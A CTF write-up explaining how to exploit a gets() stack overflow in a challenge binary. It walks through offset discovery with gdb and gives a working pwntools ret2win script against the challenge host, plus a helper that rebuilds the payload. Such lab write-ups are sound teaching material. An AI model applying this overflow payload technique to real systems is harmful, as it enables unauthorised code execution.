# [CH] Tears of the Kingdom (Lite)

###### tags:`Writeup` `Pwn` `Chinese`

> [name=FlyDragon]

## Step.1

Reading the source shows that the Fuse feature has a buffer overflow: `item_buf` is 0xff bytes long, but `gets()` reads until a newline with no length limit, so anything longer than the buffer runs into the saved rbp and the return address.

```c
printf("What do you want to combine your Master Sword with?\n");
char item_buf[0xff];
gets(item_buf);   /* unbounded read: this is the overflow the challenge is built around */
printf("Wow, you get a Master %s Sword!\n", item_buf);
```

There is also a suspicious `backdoor()` function. The goal is to use the overflow to redirect execution into `backdoor()` and read the flag.

## Step.2

Inspect `backdoor()` with radare2:

```
[0x00401110]> aaa
[0x00401110]> afl
[0x00401110]> pdf @ sym.backdoor
```

Returning to the very start of `backdoor()` (its `push rbp`) makes the connection end with an EOF, so the exploit jumps directly to 0x401260, past the function prologue. (A stack that is misaligned when a function is entered through a crafted return address is a common cause of a crash at this point; skipping `push rbp` shifts rsp by 8 and usually avoids it.)

## Step.3

Next, compute the padding. Sending the alphabet pattern below three times in a row triggers a segmentation fault.

Pattern:

```
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
```

```
(gdb) info register
```

```
rbp            0x5252525251515151  0x5252525251515151
```

0x51 is `Q` and 0x52 is `R`, so the saved rbp was overwritten with `QQQQRRRR` (x86-64 is little-endian, so the `Q`s are the low bytes). Because the pattern repeats every 104 bytes the value alone is ambiguous, but the crash happened on the third copy and the buffer is only 0xff bytes, so the padding is everything up to the `QQQQRRRR` of the third block: 104 + 104 + 64 = 272 bytes.

## Step.4

After the 272 bytes of padding come 8 bytes of `A` to overwrite the saved rbp, then the address to jump to, which lands on the return address.

Exploit script:

```py
from pwn import *

r = remote("lotuxctf.com", 10002)
r.sendline(b"3")  # choose the Fuse option from the menu

# 272 bytes: two full alphabet blocks plus A..P of a third, ending right before the saved rbp
padding = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"
rbp = b"AAAAAAAA"      # overwrites the saved rbp (its value does not matter here)
add = p64(0x401260)    # return address: backdoor() just past its prologue

r.sendline(padding + rbp + add)
r.interactive()
```
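The offset calculation in Step.3 and the payload layout in Step.4 can be done generically rather than by counting letters by hand. The following Python is an added example, not code from the writeup: it rebuilds the same repeating alphabet pattern, turns the rbp value gdb printed back into the bytes that overwrote it, and locates those bytes in the pattern. The numbers it uses are the writeup's own (the rbp value `0x5252525251515151`, the `0xff` buffer, the `0x401260` target); the three-block pattern length and the function and constant names are assumptions for the example. Because the alphabet repeats every 104 bytes, `QQQQRRRR` matches several times; the example discards candidates that fall inside the buffer and refuses to guess if more than one remains, which is the weakness pwntools' `cyclic()`/`cyclic_find()` (a de Bruijn sequence) avoids.

```python
"""Offset recovery for the repeating AAAABBBB...ZZZZ pattern (added example)."""
import string
import struct

# One block of the writeup's pattern: each uppercase letter four times, 104 bytes.
ALPHABET_BLOCK = "".join(c * 4 for c in string.ascii_uppercase).encode()


def make_pattern(length):
    """Repeat ALPHABET_BLOCK until the pattern is exactly `length` bytes long."""
    reps = length // len(ALPHABET_BLOCK) + 1
    return (ALPHABET_BLOCK * reps)[:length]


def register_bytes(value):
    """The 8 bytes that landed in a 64-bit register, given the value gdb prints.

    x86-64 is little-endian, so the low byte of the value was written first.
    """
    return struct.pack("<Q", value)


def find_all(haystack, needle):
    """Every offset at which `needle` occurs; a repeating pattern yields several."""
    offsets, start = [], 0
    while (idx := haystack.find(needle, start)) != -1:
        offsets.append(idx)
        start = idx + 1
    return offsets


def saved_rbp_offset(pattern, rbp_value, buf_size):
    """Offset of the saved rbp from the start of the overflowed buffer.

    QQQQRRRR appears once per block, so candidates below `buf_size` are
    discarded: the saved rbp cannot sit inside the buffer itself. If more
    than one candidate survives, the pattern was too long to be conclusive
    and the caller has to shorten it (or use a non-repeating pattern).
    """
    candidates = [o for o in find_all(pattern, register_bytes(rbp_value))
                  if o >= buf_size]
    if len(candidates) != 1:
        raise ValueError("ambiguous or absent offset, candidates: %r" % candidates)
    return candidates[0]


def build_payload(rbp_offset, target):
    """padding | 8 bytes over the saved rbp | return address, as in the writeup."""
    return b"A" * rbp_offset + b"B" * 8 + struct.pack("<Q", target)


# Constructed from the writeup: three pattern repetitions crashed with this rbp,
# item_buf is 0xff bytes, and 0x401260 is the address the writeup returns to.
CRASH_RBP = 0x5252525251515151
BUF_SIZE = 0xFF
TARGET = 0x401260


def demo():
    """Recover the offset from the writeup's crash and build the matching payload."""
    pattern = make_pattern(3 * len(ALPHABET_BLOCK))
    off = saved_rbp_offset(pattern, CRASH_RBP, BUF_SIZE)
    return off, build_payload(off, TARGET)


if __name__ == "__main__":
    off, payload = demo()
    print("saved rbp at offset %d, return address at offset %d" % (off, off + 8))
    print("payload length %d, last 8 bytes %r" % (len(payload), payload[-8:]))
```

Running it reports the saved rbp at offset 272 and the return address at 280, matching the hand count in Step.3 (two full blocks plus `A` through `P` of the third). Sending four blocks instead of three would leave both 272 and 376 as candidates above the 0xff buffer, and the function raises rather than picking one.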